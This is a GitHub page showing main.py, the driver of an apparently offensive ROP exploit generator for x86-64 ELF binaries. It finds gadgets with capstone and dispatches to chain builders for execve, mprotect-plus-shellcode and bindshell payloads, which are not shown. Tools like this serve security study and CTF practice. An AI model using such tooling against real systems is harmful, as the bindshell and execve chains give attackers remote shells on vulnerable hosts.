-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathmain.py
More file actions
executable file
·106 lines (78 loc) · 3.96 KB
/
main.py
File metadata and controls
executable file
·106 lines (78 loc) · 3.96 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/python3
# This is the driver file.
from capstone import *
from argparse import ArgumentParser
from elftools.elf.elffile import ELFFile
import get_gadgets
import categorize
import chain
import print_pretty
import general
import execveChain
import mprotectChain
import bindshellChain
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-f", "--file", dest="filename",
help="vulnerable executable", metavar="FILE")
parser.add_argument("-l", "--length", dest="length",
help="Max number of bytes to traverse above c3", metavar="NUM")
parser.add_argument("-e", "--exploitType", dest="exploitType", metavar="EXPLOITTYPE")
parser.add_argument("-g", "--gadgets", dest="gadgets", help="Flag to specify that gadgets need to be displayed" ,action='store_true')
args = parser.parse_args()
if(args.filename == None):
print("Use the --file or -f flags to enter the vulnerable executable!")
exit(1)
if(args.length == None):
print("Use the --length or -l flag to enter the max number of bytes to traverse above c3!")
exit(1)
if(args.gadgets == False):
if(args.exploitType == None):
print("Use the --exploitType flag to enter the type of exploit you need. ")
print("There are 2 types of exploit as of now: ")
print("1. 'execve' : Standard execve() ROP shellcode")
print("2. 'mprotect' : mprotect() ROP Shellcode combined with execve traditional shellcode")
print("3. 'bindshell' : Get a bindshell using ROP Shellcode")
exit(1)
vulnExecutable = str(args.filename)
gadgetLength = int(args.length)
with open(vulnExecutable, 'rb') as fd:
elffile = ELFFile(fd)
print("Searching all executable sections....")
for section in elffile.iter_sections():
curr_code = elffile.get_section_by_name(section.name)
if(curr_code['sh_flags'] & 4): # only if the first bit of sh_flags is set, is the section executable and we can collect gadgets from here
print("Searching the " + section.name + " section")
section_name = section.name
code = elffile.get_section_by_name(section_name)
opcodes = code.data()
addr = code['sh_addr'] # section header address
# print('Entry Point: '+ str(hex(elffile.header['e_entry'])))
EntryAddress = addr # elffile.header['e_entry']
md = Cs(CS_ARCH_X86, CS_MODE_64)
instructions = md.disasm(opcodes,addr)
ins = md.disasm(opcodes[0], addr)
if instructions == 0:
print("Unable to disassemble executable")
exit(1)
get_gadgets.GetAllGadgets(instructions, code.data(), EntryAddress, get_gadgets.SpecialInstructions,gadgetLength)
if args.gadgets == True:
print_pretty.print_pretty(get_gadgets.allGadgets)
TwoInstGadgets = categorize.getLNGadgets(get_gadgets.allGadgets, 2)
general.ALLGADGETS = categorize.categorize(TwoInstGadgets)
# execve() ROP Shellcode
if args.exploitType == "execve" :
execveChain.execveROPChain(general.ALLGADGETS, vulnExecutable)
# mprotect() ROP Shellcode + execve() traditional Shellcode
elif args.exploitType == "mprotect" :
mprotectChain.mprotectROPChain(general.ALLGADGETS, vulnExecutable)
# BindShell using ROP Shellcode
elif args.exploitType == "bindshell" :
bindshellChain.bindshellROPChain(general.ALLGADGETS, vulnExecutable)
# If we don't have the exploit
else:
print("We support the following exploits: ")
print("1. 'execve' : Standard execve() ROP shellcode")
print("2. 'mprotect' : mprotect() ROP Shellcode combined with execve traditional shellcode")
print("3. 'bindshell' : Get a bindshell using ROP Shellcode")
exit(1)